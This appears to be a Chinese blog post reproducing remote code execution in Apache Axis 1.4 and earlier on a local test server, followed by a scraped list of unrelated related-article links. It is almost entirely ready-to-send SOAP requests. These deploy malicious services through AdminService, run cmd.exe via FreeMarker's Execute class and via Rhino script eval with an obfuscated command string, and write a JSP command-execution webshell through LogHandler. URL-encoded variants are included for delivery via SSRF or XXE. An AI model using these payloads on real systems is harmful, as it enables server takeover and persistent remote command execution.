1、环境搭建

在idea 上新建项目,然后用tomcat运行即可

2、漏洞复现

2、1 freemarker.template.utility.Execute

如果项目里面没有freemarker 就添加,这里添加的是 freemarker-2.3.30.jar

  • 创建 freemarkerTest services ,返回Done processing 即表示创建成功,同时访问services页面也可以看到freemarkerTest services
POST /services/AdminService HTTP/1.1

Pragma: no-cache

Cache-Control: no-cache

sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"

sec-ch-ua-mobile: ?0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Referer: http://localhost:8083/services

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Connection: close

SOAPAction:

Content-Type: text/xml;charset=UTF-8

Host: localhost:8083

Content-Length: 632

<?xml version="1.0" encoding="UTF-8"?>

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">

  <soapenv:Body>

    <deployment xmlns="http://xml.apache.org/axis/wsdd/"

                xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">

       <service name="freemarkerTest" provider="java:RPC">

		<parameter name="className" value="freemarker.template.utility.Execute"/>

		<parameter name="allowedMethods" value="*"/>

       </service>

    </deployment>

  </soapenv:Body>

</soapenv:Envelope>
  • GET 创建service ,配合ssrf xxe 使用(当 "enableRemoteAdmin" 为 "false" )时
!--><deployment xmlns="http://xml.apache.org/axis/wsdd/"

                xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">

       <service name="freemarkerTest" provider="java:RPC">

		<parameter name="className" value="freemarker.template.utility.Execute"/>

		<parameter name="allowedMethods" value="*"/>

       </service>

    </deployment

进行urlencode

%21%2d%2d%3e%3c%64%65%70%6c%6f%79%6d%65%6e%74%20%78%6d%6c%6e%73%3d%22%68%74%74%70%3a%2f%2f%78%6d%6c%2e%61%70%61%63%68%65%2e%6f%72%67%2f%61%78%69%73%2f%77%73%64%64%2f%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%78%6d%6c%6e%73%3a%6a%61%76%61%3d%22%68%74%74%70%3a%2f%2f%78%6d%6c%2e%61%70%61%63%68%65%2e%6f%72%67%2f%61%78%69%73%2f%77%73%64%64%2f%70%72%6f%76%69%64%65%72%73%2f%6a%61%76%61%22%3e%0a%20%20%20%20%20%20%20%3c%73%65%72%76%69%63%65%20%6e%61%6d%65%3d%22%66%72%65%65%6d%61%72%6b%65%72%54%65%73%74%22%20%70%72%6f%76%69%64%65%72%3d%22%6a%61%76%61%3a%52%50%43%22%3e%0a%09%09%3c%70%61%72%61%6d%65%74%65%72%20%6e%61%6d%65%3d%22%63%6c%61%73%73%4e%61%6d%65%22%20%76%61%6c%75%65%3d%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%2f%3e%0a%09%09%3c%70%61%72%61%6d%65%74%65%72%20%6e%61%6d%65%3d%22%61%6c%6c%6f%77%65%64%4d%65%74%68%6f%64%73%22%20%76%61%6c%75%65%3d%22%2a%22%2f%3e%0a%20%20%20%20%20%20%20%3c%2f%73%65%72%76%69%63%65%3e%0a%20%20%20%20%3c%2f%64%65%70%6c%6f%79%6d%65%6e%74

http://localhost:8083/services/AdminService?method= 将urlencode之后的值放在此处

  • 执行命令
POST /services/freemarkerTest HTTP/1.1

sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"

sec-ch-ua-mobile: ?0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Referer: http://localhost:8083/services

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Connection: close

SOAPAction:

Content-Type: text/xml;charset=UTF-8

Host: localhost:8083

Content-Length: 671

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">

  <soapenv:Body>

    <exec soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">

      <arg0 href="#id0"/>

    </exec>

    <multiRef id="id0" soapenc:root="0" soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" soapenc:arrayType="xsd:anyType[1]" xsi:type="soapenc:Array" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">

      <multiRef xsi:type="soapenc:string">cmd.exe /c echo 111111</multiRef>

    </multiRef>

  </soapenv:Body>

</soapenv:Envelope>



<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:util="http://utility.template.freemarker" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">

   <soapenv:Header/>

   <soapenv:Body>

      <util:exec soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">

         <arguments>

            <string xsi:type="soapenc:string">cmd.exe /c whoami</string>

         </arguments>

      </util:exec>

   </soapenv:Body>

</soapenv:Envelope>

  • 卸载service
POST /services/AdminService HTTP/1.1

Pragma: no-cache

Cache-Control: no-cache

sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"

sec-ch-ua-mobile: ?0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Referer: http://localhost:8083/services

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Connection: close

SOAPAction:

Content-Type: text/xml;charset=UTF-8

Host: localhost:8083

Content-Length: 395

<?xml version="1.0" encoding="UTF-8"?>

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">

  <soapenv:Body>

    <undeployment xmlns="http://xml.apache.org/axis/wsdd/">

      <service name="freemarkerTest"/>

    </undeployment>

  </soapenv:Body>

</soapenv:Envelope>


http://localhost:8083/services/AdminService?method=%21%2d%2d%3e%3c%75%6e%64%65%70%6c%6f%79%6d%65%6e%74%20%78%6d%6c%6e%73%3d%22%68%74%74%70%3a%2f%2f%78%6d%6c%2e%61%70%61%63%68%65%2e%6f%72%67%2f%61%78%69%73%2f%77%73%64%64%2f%22%3e%0a%20%20%20%20%20%20%3c%73%65%72%76%69%63%65%20%6e%61%6d%65%3d%22%66%72%65%65%6d%61%72%6b%65%72%54%65%73%74%22%2f%3e%0a%20%20%20%20%3c%2f%75%6e%64%65%70%6c%6f%79%6d%65%6e%74

2、2 com.sun.script.javascript.RhinoScriptEngine

jdk <= 1.7 可用 本地复现用的 jdk 1.7.0_79

  • 创建services
POST /services/AdminService HTTP/1.1

Pragma: no-cache

Cache-Control: no-cache

sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"

sec-ch-ua-mobile: ?0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Referer: http://localhost:8083/services

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Connection: close

SOAPAction:

Content-Type: text/xml;charset=UTF-8

Host: localhost:8083

Content-Length: 1074

<?xml version="1.0" encoding="UTF-8"?>

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">

  <soapenv:Body>

    <deployment xmlns="http://xml.apache.org/axis/wsdd/"

                xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">

       <service name="RhinoScriptEngineServiceTest" provider="java:RPC">

          <parameter name="className" value="com.sun.script.javascript.RhinoScriptEngine" />

          <parameter name="allowedMethods" value="eval" />

          <typeMapping deserializer="org.apache.axis.encoding.ser.BeanDeserializerFactory"

                     type="java:javax.script.SimpleScriptContext"

                     qname="ns:SimpleScriptContext"

                     serializer="org.apache.axis.encoding.ser.BeanSerializerFactory"

                     xmlns:ns="urn:beanservice" regenerateElement="false">

          </typeMapping>

      </service>

    </deployment>

  </soapenv:Body>

</soapenv:Envelope>
  • GET 创建service ,配合ssrf xxe 使用(当 "enableRemoteAdmin" 为 "false" )时
!--><deployment xmlns="http://xml.apache.org/axis/wsdd/"

                xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">

       <service name="RhinoScriptEngineServiceTest" provider="java:RPC">

          <parameter name="className" value="com.sun.script.javascript.RhinoScriptEngine" />

          <parameter name="allowedMethods" value="eval" />

          <typeMapping deserializer="org.apache.axis.encoding.ser.BeanDeserializerFactory"

                     type="java:javax.script.SimpleScriptContext"

                     qname="ns:SimpleScriptContext"

                     serializer="org.apache.axis.encoding.ser.BeanSerializerFactory"

                     xmlns:ns="urn:beanservice" regenerateElement="false">

          </typeMapping>

      </service>

    </deployment

进行urlencode

http://localhost:8083/services/AdminService?method=%21%2d%2d%3e%3c%64%65%70%6c%6f%79%6d%65%6e%74%20%78%6d%6c%6e%73%3d%22%68%74%74%70%3a%2f%2f%78%6d%6c%2e%61%70%61%63%68%65%2e%6f%72%67%2f%61%78%69%73%2f%77%73%64%64%2f%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%78%6d%6c%6e%73%3a%6a%61%76%61%3d%22%68%74%74%70%3a%2f%2f%78%6d%6c%2e%61%70%61%63%68%65%2e%6f%72%67%2f%61%78%69%73%2f%77%73%64%64%2f%70%72%6f%76%69%64%65%72%73%2f%6a%61%76%61%22%3e%0a%20%20%20%20%20%20%20%3c%73%65%72%76%69%63%65%20%6e%61%6d%65%3d%22%52%68%69%6e%6f%53%63%72%69%70%74%45%6e%67%69%6e%65%53%65%72%76%69%63%65%54%65%73%74%22%20%70%72%6f%76%69%64%65%72%3d%22%6a%61%76%61%3a%52%50%43%22%3e%0a%20%20%20%20%20%20%20%20%20%20%3c%70%61%72%61%6d%65%74%65%72%20%6e%61%6d%65%3d%22%63%6c%61%73%73%4e%61%6d%65%22%20%76%61%6c%75%65%3d%22%63%6f%6d%2e%73%75%6e%2e%73%63%72%69%70%74%2e%6a%61%76%61%73%63%72%69%70%74%2e%52%68%69%6e%6f%53%63%72%69%70%74%45%6e%67%69%6e%65%22%20%2f%3e%0a%20%20%20%20%20%20%20%20%20%20%3c%70%61%72%61%6d%65%74%65%72%20%6e%61%6d%65%3d%22%61%6c%6c%6f%77%65%64%4d%65%74%68%6f%64%73%22%20%76%61%6c%75%65%3d%22%65%76%61%6c%22%20%2f%3e%0a%20%20%20%20%20%20%20%20%20%20%3c%74%79%70%65%4d%61%70%70%69%6e%67%20%64%65%73%65%72%69%61%6c%69%7a%65%72%3d%22%6f%72%67%2e%61%70%61%63%68%65%2e%61%78%69%73%2e%65%6e%63%6f%64%69%6e%67%2e%73%65%72%2e%42%65%61%6e%44%65%73%65%72%69%61%6c%69%7a%65%72%46%61%63%74%6f%72%79%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%74%79%70%65%3d%22%6a%61%76%61%3a%6a%61%76%61%78%2e%73%63%72%69%70%74%2e%53%69%6d%70%6c%65%53%63%72%69%70%74%43%6f%6e%74%65%78%74%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%71%6e%61%6d%65%3d%22%6e%73%3a%53%69%6d%70%6c%65%53%63%72%69%70%74%43%6f%6e%74%65%78%74%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%73%65%72%69%61%6c%69%7a%65%72%3d%22%6f%72%67%2e%61%70%61%63%68%65%2e%61%78%69%73%2e%65%6e%63%6f%64%69%6e%67%2e%73%65%72%2e%42%65%61%6e%53%65%72%69%61%6c%69%7a%65%72%46%61%63%74%6f%72%79%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%78%6d%6c%6e%73%3a%6e%73%3d%22%75%72%6e%3a%62%65%61%6e%73%65%72%76%69%63%65%22%20%72%65%67%65%6e%65%72%61%74%65%45%6c%65%6d%65%6e%74%3d%22%66%61%6c%73%65%22%3e%0a%20%20%20%20%20%20%20%20%20%20%3c%2f%74%79%70%65%4d%61%70%70%69%6e%67%3e%0a%20%20%20%20%20%20%3c%2f%73%65%72%76%69%63%65%3e%0a%20%20%20%20%3c%2f%64%65%70%6c%6f%79%6d%65%6e%74
  • 执行命令
<?xml version='1.0' encoding='UTF-8'?>

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:jav="http://javascript.script.sun.com">

  <soapenv:Body>

    <eval xmlns="http://localhost:8083/services/scriptEngine">

      <arg0 xmlns=""><![CDATA[function test(){var cmd1='c'; cmd1 += 'm';cmd1 += 'd';cmd1 += '.';cmd1 += 'e';   cmd1 += 'x';cmd1 += 'e';var cmd2 = '/'; cmd2 += 'c'; var pb = new java.lang.ProcessBuilder(cmd1,cmd2,'ver');var process = pb.start(); var ret = new java.util.Scanner(process.getInputStream()).useDelimiter('\\A').next();return ret;}test();]]>

      </arg0>

      <arg1 xmlns="" xsi:type="urn:SimpleScriptContext" xmlns:urn="urn:beanservice"></arg1>

    </eval>

  </soapenv:Body>

</soapenv:Envelope>
  • 卸载service
<?xml version="1.0" encoding="UTF-8"?>

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">

  <soapenv:Body>

    <undeployment xmlns="http://xml.apache.org/axis/wsdd/">

      <service name="RhinoScriptEngineServiceTest"/>

    </undeployment>

  </soapenv:Body>

</soapenv:Envelope>


http://localhost:8083/services/AdminService?method=%21%2d%2d%3e%3c%75%6e%64%65%70%6c%6f%79%6d%65%6e%74%20%78%6d%6c%6e%73%3d%22%68%74%74%70%3a%2f%2f%78%6d%6c%2e%61%70%61%63%68%65%2e%6f%72%67%2f%61%78%69%73%2f%77%73%64%64%2f%22%3e%0a%20%20%20%20%20%20%3c%73%65%72%76%69%63%65%20%6e%61%6d%65%3d%22%52%68%69%6e%6f%53%63%72%69%70%74%45%6e%67%69%6e%65%53%65%72%76%69%63%65%54%65%73%74%22%2f%3e%0a%20%20%20%20%3c%2f%75%6e%64%65%70%6c%6f%79%6d%65%6e%74

2、3 写文件

  • 创建service
<?xml version="1.0" encoding="UTF-8"?>

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">

  <soapenv:Body>

    <deployment xmlns="http://xml.apache.org/axis/wsdd/"

                xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">

       <service name="writeFile2" provider="java:RPC">

		<requestFlow>

            <handler type="java:org.apache.axis.handlers.LogHandler" >

                <parameter name="LogHandler.fileName" value="F:/work/SpringStudy/out/artifacts/axis_rce_test_war_exploded/shell123.jsp" />

                <parameter name="LogHandler.writeToConsole" value="false" />

            </handler>

         </requestFlow>

          <parameter name="className" value="java.util.Random" />

          <parameter name="allowedMethods" value="*" />

       </service>

    </deployment>

  </soapenv:Body>

</soapenv:Envelope>
  • 写文件
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:util="http://util.java">

   <soapenv:Header/>

   <soapenv:Body>

      <util:ints soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">

         <in0 xsi:type="xsd:int" xs:type="type:int" xmlns:xs="http://www.w3.org/2000/XMLSchema-instance"><![CDATA[

<%@page import="java.util.*,java.io.*"%><% if (request.getParameter("c") != null) { Process p = Runtime.getRuntime().exec(request.getParameter("c")); DataInputStream dis = new DataInputStream(p.getInputStream()); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); }; p.destroy(); }%>

]]></in0>

         <in1 xsi:type="xsd:int" xs:type="type:int" xmlns:xs="http://www.w3.org/2000/XMLSchema-instance">?</in1>

      </util:ints>

   </soapenv:Body>

</soapenv:Envelope>

参考

Axis <=1.4 RCE 复现的更多相关文章

  1. 应用Apache Axis进行Web Service开发

    转自(http://tscjsj.blog.51cto.com/412451/84813) 一.概述 SOAP原意为Simple Object Access Protocol(简单对象访问协议),是一 ...

  2. 有理数的稠密性(The rational points are dense on the number axis.)

    每一个实数都能用有理数去逼近到任意精确的程度,这就是有理数的稠密性.The rational points are dense on the number axis.

  3. 使用axis开发web service服务端

    一.axis环境搭建 1.安装环境 JDK.Tomcat或Resin.eclipse等. 2.到 http://www.apache.org/dyn/closer.cgi/ws/axis/1_4下载A ...

  4. AXIS最佳实践

    前言: Axis是apache一个开源的webservice服务,需要web容器进行发布.本节主要用于介绍使用Axis开发webservice,包括服务端的创建.webservice的部署.客户端的调 ...

  5. axis 理解

    前言 使用numpy sum(a,axis=0)的时候,对axis参数比较费解,和直觉不太一样,故此记录 b = np.arange(12).reshape(3,4) b array([[ 0, 1, ...

  6. Axis 1 https(SSL) client 证书验证错误ValidatorException workaround

    Axis 1.x 编写的client在测试https的webservice的时候, 由于client 代码建立SSL连接的时候没有对truststore进行设置,在与https部署的webservic ...

  7. axis

    http://www.cnblogs.com/liyanblog/archive/2011/11/29/2266942.html 报错: D:\ws\la\WSofSMNS\WebRoot\WEB-I ...

  8. 【知识积累】服务器端获取客户端的IP地址(当客户端调用由Axis开发的WebService)

    一.前言 由于项目中一个小的模块需要获取客户端的IP地址以保证安全调用webservice接口,项目中客户端使用C#编写,服务器端使用Java编写,服务器端与客户端采用Axis开发的WebServic ...

  9. 使用axis调用WebService服务端

    由于项目中要调用其他公司的接口,研究了下axis调用webService这种方式,现将代码贴出,以备以后查阅: package com.xbq; import javax.xml.namespace. ...

  10. MATLAB axis和axes的区别

    axis中文为“轴”之意,在matlab中用于控制坐标轴的范围和样式(颜色等). axis([XMIN XMAX YMIN YMAX]) 设置当前所绘图像的x轴和y轴的范围.axis([XMIN XM ...

随机推荐

  1. Java面向对象04——构造器

    类中的构造器也成为构造方法,是在进行创建对象的时候必须调用的.并且构造器有以下两个特点: 必须和类的名字相同 必须没有返回值,也不能写void  package oop.demon01.demon02 ...

  2. MSF+Nmap TCP空闲扫描

    MSF+Nmap TCP空闲扫描 前言 TCP空闲扫描是一种高级的扫描技术,可以冒充内网中另一台IP地址来对内网中的目标进行隐秘的扫描. 正文 在进行扫描之前,我们需要了解一个概念,即递增IP帧标识, ...

  3. Bugku-web-秋名山老司机

    计算式子的值然后使用post方法传值.直接脚本跑. import requestsimport reurl = "http://123.206.87.240:8002/qiumingshan ...

  4. 基于Unity的A星寻路算法(绝对简单完整版本)

    前言 在上一篇文章,介绍了网格地图的实现方式,基于该文章,我们来实现一个A星寻路的算法,最终实现的效果为: 项目源码已上传Github:AStarNavigate 在阅读本篇文章,如果你对于里面提到的 ...

  5. miniFTP项目实战六

    项目简介: 在Linux环境下用C语言开发的Vsftpd的简化版本,拥有部分Vsftpd功能和相同的FTP协议,系统的主要架构采用多进程模型,每当有一个新的客户连接到达,主进程就会派生出一个ftp服务 ...

  6. NOIP 模拟 $28\; \rm 客星璀璨之夜$

    题解 \(by\;zj\varphi\) 概率与期望,考虑 \(\rm dp\) 设 \(dp_{i,j}\) 为消除 \(i-j\) 这一段行星的期望,转移: 枚举 \(k\) 为当前状态下第一个撞 ...

  7. ASP.NET Core:ASP.NET Core中使用NLog记录日志

    一.前言 在所有的应用程序中,日志功能是不可或缺的模块,我们可以根据日志信息进行调试.查看产生的错误信息,在ASP.NET Core中我们可以使用log4net或者NLog日志组件来实现记录日志的功能 ...

  8. WPF QQ群发助手

    一.界面如下

  9. Semaphore 的使用思路

    转自:https://www.cnblogs.com/klbc/p/9500947.html 最近在看一本书<Java并发编程 核心方法与框架>,打算一边学习一边把学习的经验记下来,所粘贴 ...

  10. Inject-APC (Ring3)

    1 // APCInject.cpp : 定义控制台应用程序的入口点. 2 // 3 4 #include "stdafx.h" 5 #include "APCInjec ...